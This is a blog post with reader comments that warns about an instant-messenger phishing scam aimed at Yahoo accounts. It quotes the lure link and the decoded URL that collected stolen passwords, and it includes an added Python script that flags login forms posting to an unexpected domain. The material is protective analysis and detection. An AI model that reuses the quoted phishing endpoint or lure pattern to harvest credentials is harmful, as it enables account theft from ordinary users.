Lorrie
lwood

Lorrie
SPIM, Phishing, and You!

So, there you are, on your IM client, and a friend sends you a link out of the blue, no hello or anything, just an innocuous link like this:

http:// www . geocities . com / input_on_new_pics_plz

Don't ever go to links that people send you out of the blue without some obvious tip-off: have you been talking already? Is it obviously going to a site in which you have a shared obscure interest?

No?

Then DON'T GO!

If you do, in this case, you get a nice-looking page that asks for your Yahoo name and password. If you have that gullible moment, the people behind it will then proceed to collect more usernames and passwords with your account, and they will have access to all your Yahoogroups--and Yahoo mail, if you use that, and so on.

If this happens to you, no software has been installed on your machine: this is all being done remotely. To lock the asshats back out, change your Yahoo password and they will no longer have access. Count yourself lucky, as other spim-trojans do change passwords, as others have found to their peril.

This has been a Public Service Announcement; more details behind this cut.

Picking apart the code reveals several obfuscated URLs and some equally obfuscated JavaScript, useful to defeat ad blockers and protect source code. A Geocities ad server in Taiwan is lame, but legitimate. The encrypted JavaScript was more than I wanted to pick at, but obfuscated URLs are easy.

The page sends your Yahoo name and password to a lengthy obfuscated URL, which I threw to the demons, particularly http://www.netdemon.net/decode.html. Decoded, your name and password get sent to:

http://www2.fiberbit.net/form/mailto.cgi

Congratulations, it just got e-mailed to Person or Persons Unknown, and your credentials will now be used to collect more names and passwords, with which the aforementioned miscreants can IM your friends, get their names and passwords, and e-mail any Yahoogroup to which you are subscribed--if you own a Yahoogroup or two, it gets worse. The only good thing you can say is that, well, at least it didn't change your Yahoo password for you.
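The decoding step described above, as an added example that is not part of the original post: it pulls the form action out of a saved page, peels the encoding, and reports whether a password form posts somewhere other than the domain it claims to be. It assumes the obfuscation is percent-encoding and HTML character references (the post does not say which scheme was used); the sample page, host names and function names are constructed for illustration.

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote, urljoin, urlsplit

class FormFinder(HTMLParser):
    """Record each <form> action and whether the form has a password field."""
    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "password": False})
        elif tag == "input" and self.forms and (a.get("type") or "").lower() == "password":
            self.forms[-1]["password"] = True

def decode_url(raw, max_rounds=5):
    """Peel layered percent-encoding and character references until stable."""
    for _ in range(max_rounds):
        decoded = html.unescape(unquote(raw))
        if decoded == raw:
            break
        raw = decoded
    return raw

def audit(page_html, page_url, expected_domain):
    """Return (decoded_action, host, off_domain) for each password form."""
    finder = FormFinder()
    finder.feed(page_html)
    results = []
    for form in finder.forms:
        if form["password"]:
            # Relative actions resolve against the page that served the form.
            url = urljoin(page_url, decode_url(form["action"]))
            host = (urlsplit(url).hostname or "").lower()
            on_domain = host == expected_domain or host.endswith("." + expected_domain)
            results.append((url, host, not on_domain))
    return results

# Constructed sample: a login form whose action host is fully percent-encoded.
HIDDEN_HOST = "".join(f"%{ord(c):02X}" for c in "collector.example.net")
SAMPLE_PAGE = f"""<form method="post" action="http://{HIDDEN_HOST}/form/mailto.cgi">
<input name="login"><input type="password" name="passwd"></form>"""
SAMPLE_URL = "http://pages.example.org/input"  # constructed hosting page

if __name__ == "__main__":
    for url, host, off in audit(SAMPLE_PAGE, SAMPLE_URL, "yahoo.com"):
        print(("OFF-DOMAIN " if off else "ok ") + url)
```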

This is a clever combination of social engineering (getting people to do what they're already inclined to) and phishing (using a faked legitimate-looking page to get real information)--clever because it's coming along an unexpected vector.

Unexpected...until you're bitten by one. I've known several who were (by this or another), two of whom have extensive experience in IT and therefore Should Have Known Better.

Don't let this happen to you!

-- Lorrie

Current Mood: calminformative
Comments

Thanks for posting this, I fell prey to this one a while back.

Heh--well, someone else on my flist was bit just this morning by this exact one, and another friend was bit by a different one a few months ago...and as she couldn't verify her identity to the Yahoo wonks, she lost her Yahoo account of over a decade's good standing.

-- Lorrie

*whimpers* Yahoo! mail sent me email today trying to coax me back to their service. There was no way to reply and tell them they'd have to pay me...

--Ember--

Or that they couldn't pay you, whichever...

*hugs*

-- Lorrie

May I link to this in my LJ to further spread the word?

Go thou and do!

-- Lorrie

Fuck off--and I'm not off this evening. 8-P

You should tell whoever got bit that they've been bit, though--at least they can fix themselves by changing their Yahoo password.

-- Lorrie

Just changed my password on GPs... the only links I seem to get via IM are from my spouse, sending me amusing webcomics.

Still, changing one's password every so often is a good security measure in any case...

-- Lorrie